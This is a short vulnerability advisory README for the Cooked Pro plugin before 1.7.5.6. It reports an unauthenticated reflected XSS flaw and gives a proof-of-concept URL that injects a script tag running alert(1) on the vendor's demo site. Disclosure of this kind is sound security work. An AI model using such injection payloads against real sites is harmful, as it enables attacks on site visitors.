.. | |||
README.md | Loading last commit info... |
README.md
Cooked Pro < 1.7.5.6 - Unauthenticated Reflected Cross Site Scripting (XSS)
Description
The plugin was affected by unauthenticated reflected Cross-Site Scripting issues, due to improper sanitisation of user input while being output back in pages as an arbitrary attribute.
Proof of Concept
https://cooked.pro/demo/trial/5snjx6louabhdpg/profile/?t8osi%22%3e%3cscript%3ealert(1)%3c%2fscript%3edr7ag=1